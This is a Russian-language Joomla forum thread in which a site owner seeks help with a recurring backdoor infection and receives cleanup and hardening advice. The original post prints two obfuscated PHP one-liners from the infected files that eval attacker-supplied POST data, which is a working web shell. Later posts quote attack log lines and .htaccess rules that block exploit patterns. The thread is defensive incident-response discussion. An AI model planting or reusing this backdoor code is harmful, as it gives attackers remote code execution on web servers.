0 Пользователей и 1 Гость просматривают эту тему.
  • 29 Ответов
  • 4494 Просмотров
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Вирус в корне сайта
« : 23.09.2015, 10:11:28 »
Кто то заливает вирус в корень сайта на Joomla 3.2, такого вида Robots.php - касперский его определяет как backdoor.php.
Этот вирус заливает в папки Joomla различные левые Php файлы с кодом примерно такими:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qb8d09c'])){eval(${$s20}['qb8d09c']);}?><?php

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na0b0b6'])) {eval($s21(${$s20}['na0b0b6']));}?><?php

Также похожие строчки появились в некоторых своих php файлах Joomla.

Понятия не имею где искать дыру)

в апаче логе нашел такие строчки:

50.62.177.106 - - [20/Sep/2015:13:36:14 +0300] "POST /robots.php HTTP/1.0" 403 1518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
45.59.31.193 - - [21/Sep/2015:12:08:29 +0300] "POST /robots.php HTTP/1.1" 200 28622 "-" "-"

Хостер отключил опасные функции PHP и включил онлайн антивирус на опасные запросы. Инфицированный сайт ничем не отличается по работе от обычного состояния. Чистил сайт но потом опять заражение повторилось.

Где копать?) плагины вроде все по удалял ненужные.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #2 : 23.09.2015, 10:28:30 »
Попробуйте http://yandex.ru/promo/manul
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #3 : 23.09.2015, 10:31:10 »
А вот тема с аналогичным вирусом и решением http://searchengines.guru/showthread.php?t=879811
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #4 : 23.09.2015, 10:44:25 »
Проверил манулом, зараженных вообще не нашел, только подозрительных файлов насчитал очень много))
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус в корне сайта
« Ответ #5 : 23.09.2015, 10:49:16 »
Самое актуальное сканировать айболитом, а дальше комплексные меры по устранению и предотвращению, зная хостеров, по опыту работы... они мало что понимают какие именно отключать функции надо и для чего вообще это делается.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #6 : 23.09.2015, 10:52:21 »
Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #7 : 23.09.2015, 10:54:13 »
удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус в корне сайта
« Ответ #8 : 23.09.2015, 10:54:41 »
Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.

А как решали вопрос с корнем проблемы?

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #9 : 23.09.2015, 11:04:25 »
Ну значит что то пропустили. После удаления всего, повторного заражения не может быть.

Для начала рекомендую посмотреть тут информацию и полистать список уязвимых приложений https://docs.joomla.org/Category:Security_Checklist/ru

Воспользоваться инструментом https://support.google.com/webmasters/answer/6066468?vid=1-635785918471659665-4262239763&rd=2
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #10 : 23.09.2015, 11:11:30 »
А как решали вопрос с корнем проблемы?
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.

Проблемы у всех почти разные. В моём случае  заражено было 749 файлов.
Везде в ручную удаляла вредоносный код, удаляла подозрительные файлы. У меня были заражены .js
не помню точно мои пошаговые действия, но сделала я всё правильно, Яндекс после перепроверки прислал положительный ответ, сайт здоров.
 
Для сканирования пробовала сервис: http://antivirus-alarm.ru/  -  выводится  путь до всех  вирусных файлов.

Кстати подозревала дырки в widjetkit

И опять же, поработал по ftp, удалил доступ, нужно опять поработать, создал/удалил
« Последнее редактирование: 23.09.2015, 11:15:25 от 12mv »
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус в корне сайта
« Ответ #11 : 23.09.2015, 11:39:50 »
Удалять ftp при lfi rfi бесполезно )

local file inclusion
remote file inclusion

А еще много что интересного есть )

Айболит рулит конечно пока что только. Ну и компонент securitycheck очевидные уязвимости показывает.
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #12 : 23.09.2015, 12:46:34 »
В любом случае, ftp просто так не должен висеть, пароли нужно постоянно менять либо создавать доступ при необходимости.
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #13 : 23.09.2015, 13:14:55 »
удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
Удаляли вы, скорее всего, последствия работы программы, а не сам код, создающий этот файл. Для того, что бы его обнаружить, ваших знаний явно недостаточно. Проверьте айболитом в режиме ssh, он много чего находит. Сервис от Яндекса, на мой взгляд, сыроват. Далее - обновите движок и все компоненты. Часто взлом происходит именно через компонент - в самой Joomla дырок почти нет. Ну и напоследок - вспомните, ставили на сайт что нибудь с варезника? Последний вариант - если денег нет на специалиста, а у вас опять проблемы - удалите вообще все файлы с хостинга, поменяйте все пароли, залейте новую Joomla, скачанную с Joomla.org и переносите данные со старого сайта, предварительно проверяя их (тексты останутся в базе данных, перенести останется папки с картинками и шаблон). А вот шаблон (а обычно в нем и размещают бэкдор) стоит проверить особо тщательно.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #14 : 23.09.2015, 13:58:55 »
В очередной раз почистил по удалял лишние плагины и компоненты, попробую проверить айболитом, если будет опять заражение то поставлю новую Joomla и новый шаблон и подключу базу старую если получиться))
 ФТП у меня отключен в настройках джумлы и на хосте не создан аккаунт
 http://antivirus-alarm.ru/   этот сервис не находит ничего)
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #15 : 23.09.2015, 14:08:10 »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #16 : 23.09.2015, 14:53:55 »
Проверил айболитом, нашел много ложного по сути, и шифрованные данные base64 ----->

например (!$status){if($customURL=$this->input->get('returnurl','','string')){$customURL= base64_decode($customURL);}$url=!empty($customURL)? $customURL : 'index.php?op

или

…plate();}if($this->template){$input=JFactory::getApplication()->input;$fileName= base64_decode($input->get('file'));$client=JApplicationHelper::getClientInfo($t

На .htaccess чето ругается.

Кто разбирается в нем??)) есть какие то нарушения?


## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

## Mod_rewrite in use.

RewriteEngine On

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #17 : 23.09.2015, 14:57:08 »
Ну, наверное вот на эту строчку ругается:
Код
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

так как там есть base64 ))
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #18 : 23.09.2015, 15:01:28 »

что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?
*

resident82

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Re: Вирус в корне сайта
« Ответ #19 : 23.09.2015, 21:35:19 »
что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?

htaccess вроде обычный стандартный.. в логах видно что свободно заходят в админку. я бы заблочил этот айпишник через htaccess + сменить логин/пароль на админку + запаролить папку админки с помощью htaccess. пароли естественно нормальные должны быть. ну и зачистить всякие левые и измененные файлы само собой.
« Последнее редактирование: 23.09.2015, 21:55:58 от resident82 »
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #20 : 24.09.2015, 07:24:23 »
Такс, поставил пароль на папку администратор на хостинге, теперь при входе в админку нужно ввести пароль дополнительный.
Сменил логин и пароль от админки
Добавил такие строчки в htaccess:

<Limit GET POST>
order allow,deny
deny from 65.193.86.2
deny from 72.81.248.66
allow from all
</Limit>
это должно заблокировать эти IP?

Что еще можно предпринять?)
« Последнее редактирование: 24.09.2015, 08:42:45 от sabnok »
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #21 : 24.09.2015, 09:35:03 »
это должно заблокировать эти IP?
Что еще можно предпринять?)
Не вижу смысла блокировать IP, так как маршрутизацию легко подделать. Например, подключившись через прокси или банально через ТОР. Заблокируете один адрес - зайдут с другого. И что, все прокси-сервера переписывать? Тогда уж раздобудьте списки серверов и заранее забейте. Всего то несколько миллионов строк в .htaccess... ))

Что еще сделать... Можете добавить плагин скрытия админки, наподобие JSecure Lite. Так вы усложните брут пароля и отбросите множество программ, которые сканируют именно админку. А так же прописать в htaccess запрет на определенные урлы, запрет на папки и т.д. Где то тут выкладывали FAQ по настройке. Ну и еще раз пройтись по всем компонентам-модулям, убедиться, что все скачано с официальных достоверных источников и имеет последнюю версию.
« Последнее редактирование: 24.09.2015, 09:38:56 от SeBun »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Вирус в корне сайта
« Ответ #22 : 24.09.2015, 11:43:54 »
А адрес админки нельзя сменить? Я вот на IPB движке так делаю, постоянно ломятся туда. На Joomla не пробовала.

Было бы ещё полезно, сделать вход в админку с одноразовым кодом, который приходит по SMS.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус в корне сайта
« Ответ #23 : 24.09.2015, 11:46:10 »
Базовую авторизацию на админку ставьте.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Вирус в корне сайта
« Ответ #24 : 24.09.2015, 11:49:08 »
Поставить плагин Marco's SQL Injection - отсылает письма с логом атаки.
http://joomlaforum.ru/index.php/topic,195980.0.html
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #25 : 24.09.2015, 12:08:41 »
А адрес админки нельзя сменить?
Есть два способа - авторизация через htpassword или (и) плагин скрытия, например, JSequre (Lite версия бесплатна). В первом случае будет запрашивать дополнительный пароль, во втором - выкидывать на главную или на специальную страницу. Можно и сменить адрес, но для этого придется лезть в ядро.
« Последнее редактирование: 24.09.2015, 12:11:56 от SeBun »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #26 : 24.09.2015, 15:26:52 »
А я просто поставил пароль на папку administrator с помощью средств хостинга, и теперь при попытке входа в админку Joomla, вылазите дополнительная форма автоизации) такой метод надежен?) или хакер может сбросить его?

нашел такое в инете:

## Начало - Запрет на выполнение php-скриптов в корне сайта
<Filesmatch ".(php)$">
order deny,allow
deny from all
</Filesmatch>
<Filesmatch "^index.php">
order allow,deny
allow from all
</Filesmatch>
<Filesmatch "^index2.php">
order deny,allow
allow from all
</Filesmatch>
## Конец - Запрет на выполнение php-скриптов в корне сайта

посколько заливают в корнеь сайта php файл, то это сможет его заблокировать?
« Последнее редактирование: 24.09.2015, 15:54:42 от sabnok »
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #27 : 24.09.2015, 23:07:44 »
если я получу доступ к корню, мне плевать на эти разрешения. Если я обнаружу, что залитый мной php не выполняется, я могу залить перловый скрипт или скачать index.php (либо взять из дистрибутива), дописать в него что нужно и залить обратно. Не занимайтесь ерундой.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Вирус в корне сайта
« Ответ #28 : 27.09.2015, 08:46:13 »
Инфицирование вроде прекратилось, но происходят такие запросы в логе

94.23.77.182 - - [27/Sep/2015:03:41:49 +0300] "POST /media/dhl/info.php HTTP/1.1" 404 1740 "-" "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.10"

что он означает? Попытку залить файл, но не удачно??
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Вирус в корне сайта
« Ответ #29 : 27.09.2015, 08:53:20 »
значит не прекратилось.таких в медиа запросов не может быть
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 167
Последний ответ 26.03.2024, 18:51:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 922
Последний ответ 25.05.2023, 08:49:57
от Театрал
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 243637
Последний ответ 14.09.2022, 14:29:43
от wishlight
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 2953
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1756
Последний ответ 22.02.2022, 11:38:15
от AlexP750